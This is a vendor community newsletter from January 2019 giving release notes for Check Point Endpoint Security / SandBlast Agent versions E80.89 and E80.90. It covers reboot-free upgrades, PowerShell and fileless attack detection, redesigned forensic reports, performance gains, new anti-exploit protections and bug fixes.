Gil Sasson

Endpoint Security / SandBlast Agent Newsletter - Versions E80.89 & E80.90

Discussion created by Gil Sasson Employee on Jan 10, 2019


Hi,

In the past few weeks we released two monthly releases of Endpoint Security / SandBlast Agent version E80.89 & E80.90.

This newsletter will summarize the new features and enhancements delivered in these releases and will begin a new tradition of Endpoint security newsletters we will send upon each release in 2019.

We will be happy to hear feedbacks or any suggestions for improvements.

 

New Features:

 

  • Windows 10 October 2018 Update Support
  • Windows Server 2019 Support
  • No Reboot Deployment

Till today, upgrade to a new Endpoint client had a big impact on the company employees, requiring everyone to reboot their machines. To improve this experience, and make the deployment smoother, we removed the need to reboot during most upgrade and installation scenarios.

 

  • Upgrades from E80.89 to later releases for most blades are supported without reboots.
  • Note: Upgrades of some Full Disk Encryption, Media Encryption and Port Protection, Capsule Docs and Anti-Malware versions might require reboot. (See sk141233)

 

  • Enhanced Fileless and Malicious PowerShell Detections engine extending Behavioral Guard capabilities.

 Fileless attacks are a very fast growing breed of attacks that don't involve the saving of a malicious file on disk. These attacks utilize script applications provided by Microsoft Windows like PowerShell. In this release, we extend Behavioral Guard capabilities to protect against Fileless and PowerShell based attacks.

 

  • Behavioral Guard now includes a multi-phase detection in order to overcome PowerShell obfuscation and encoding techniques.
  • In addition, in Windows 10, Behavioral Guard integrates with Microsoft’s Anti-Malware Scan Interface (AMSI) to receive and analyze decoded scripts.
  • On detection the script content will be visible in the Forensics report for further analysis.

 

  • Forensic report overhaul with a new style and completely redesigned Overview and General screens.

As attacks evolve there is an ever greater need to be able to identify, classify and prioritize the attacks being mitigated on the endpoint. To that end, we have made changes to the Forensics report to better include and highlight reputation and attack data. This translates to tighter integration with Reputation and a redesigned Forensic Report with more emphasis on the attack details.

 

  • Redesigned Overview screen with focus on attack details, type and name
  • Redesigned General screen with more details on the trigger for the attack
  • Malware Family name when present in both the overview and individual process details.
  • The Tree and Tree-Timeline views were updated with navigational toolbars that enable the ability to more quickly find processes of interest.
  • Many more changes are present, view the full release notes

 

 

  • Forensics now has major performance improvements.

Forensics is one of the most powerful EDR systems that exist today, however it does record a lot of data. This has led to I/O issues on a few machines. By analyzing the data collected over a two year period, we have identified records that do not need to be stored in order for the Forensic Report to be accurately generated.

 

  • Reduced on average about 50% of file ops stored
  • Reduced on average about 10% of registry ops stored.
  • Boosted Forensics Analyzer performance on average by 20%.

 

  • Anti-Exploit new detections and default protections

We continue to strengthen our Anti-Exploit technology with protection from new attack vectors. Anti-Exploit relies on the fact that there are a limited number of methods that a vulnerability in a process can be exploited (like Return Oriented Programming) and includes protections for these methods. This provides automatic protection for new zero day attacks that exploit new vulnerabilities. By monitoring the exploit landscape, we have added another protection and enhanced our protections to cover a new application.

 

  • Stack Pivoting protection – added protection for a new potential technique which involves an exploit attempting to create a fake stack from attacker controlled memory like a heap.
  • MS Equation Editor protection - given the prevalence of attacks that are running on Equation Editor, we added it to our default protected processes.

 

Those releases also include many Improvements and Enhancements:

E80.90:

  • Anti-Ransomware, Behavioral Guard and Forensics
  • Improves Forensic reports with decoded PowerShell scripts from AMSI integration.

This feature is only available in Windows 10.

  • Improves Forensics performance by adding dynamic exclusions for file operations based on a new heuristic.

This can reduce the number of file operations stored by up to 30%.

  • Updates the default exclusions for Anti-Ransomware.
  • Enhances Behavioral Guard with the ability to do deep inspections of both behavior and script content of PowerShell and Fileless attacks.
  • Adds many new suspicious events for the Forensic report, including new PowerShell related suspicious events.
  • Fixes an issue that could lead to incomplete termination of processes involved in a Ransomware incident.
  • Improves Entry Point calculations across multiple scenarios to be more accurate in the Forensic Report.
  • Shows termination status of processes for every process shown in the Forensics report.
  • The Forensics report now shows the termination status for every process present in the report.
  • Fixes an issue where some Forensic report icons may be missing when upgrading to E80.89.

The icons are now present when upgrading to E80.90.

  • Fixes rare issue with large continuous CPU utilization when the Forensics service is unable to communicate with the driver.
  • Improves Forensic performance by adding static exclusions for well-known file operations.

This addition alone can reduce the number of file operations stored by up to 80% on some machines.

  • Fixes a crash occurring when Forensics, Anti-Ransomware and Behavior Guard are processing an existing policy while receiving a new policy.
  • Fixes an issue with the scroll bar not appearing correctly if there are multiple nodes in the Entry Point view of the Forensics Report.
  • Fixes a Forensics Analysis issue where script processes like PowerShell do not appear in the report when Cmd is involved and the script process is not the trigger.
  • Fixes a majority of issues where the Entry Point of an attack could be empty.

Now there should almost always be an Entry Point.

  • Processes showing in a report that are closed at the time of the generation of the report will now correctly show as terminated, even if the remediation policy for termination is disabled.
  • Improves the Forensics report so that Command Prompts (cmd.exe) opened for typing no longer appear in the Forensic report, but may appear in the Entry Point instead.
  • Process arguments and script contents are now encoded in the Forensic reports.

This prevents the deletion of the reports by Anti-Viruses looking for specific signatures found in the argument or script content.

  • Adds support to include the Malware Family from URL reputation if present in the Forensic report.
  • Improves the Forensic Analysis to consider following files in the argument of processes already included as part of the incident.
  • Fixes an issue which could result in the User Name appearing empty in the Forensic Report.
  • Fixes a visual issue in the Forensic report where the distance between processes could be very large if a process has a lot of lines of text.
  • Fixes an issue which caused duplication of log events in Forensics.
  • Improves Forensic performance by dynamically excluding registry operations based on a new heuristic.

On average, 10% of registry operations are now excluded.

 

  • Threat Emulation and Anti-Exploit
  • Anti-Exploit now has an additional exploit prevention technology called stack pivoting.
  • Anti-Exploit now protects Equation Editor from known and unknown exploit attempts.

 

  • Anti-Bot
  • Fixes a crash when the Anti-Bot database is held by another process in the system.

 

  • SandBlast Agent Updater
  • Adds support for Static Analysis updates running in parallel to other updates using the Updater.
  • Fixes an issue where the wrong service is restarted when updating two products together.

  

E80.89:

  • Anti-Ransomware, Behavioral Guard and Forensics

o   Forensics reports no longer show Anti-Bot in "detect" mode as having a "Blocked" status.

o   Resolves a Forensics Analysis issue when incidents that include the Task Scheduler may add unrelated processes to the Forensics report.

o   Resolves a Forensics analysis issue where some "riskware" processes are not properly followed and terminated.

o   Forensics reports now include the Malware Family Name when available to the reputation section of a process.

o   Resolves a rare Forensics analysis issue when an entry point jumps between different browsers incorrectly.

o   The Forensic report's network view now shows entry point URLs and associated Domains.

o   Enforces exclusions of Check Point signed process related file activity in the driver to improve Forensics performance.

  • Threat Emulation and Anti-Exploit

o   Resolved few cases where Threat Emulation file monitoring locked the file interfering with other application usage

  • SandBlast Agent Infrastructure
  • Resolves an issue of Remediation request ID collisions and the interference in remediation if multiple requests appear together.
  • Client Infrastructure
    • Improves Software Development Status reporting.

For more information about E80.90, refer to: Enterprise Endpoint Security E80.90 Windows Clients

For more information about E80.89, refer to: Enterprise Endpoint Security E80.89 Windows Clients

Please contact us if you encounter any issues. We are happy to hear from you at any time. Your feedback is valuable to us.

 

Thank you,

Gil Sasson

Endpoint Cyber Security Project Manager

 

Attachments

Outcomes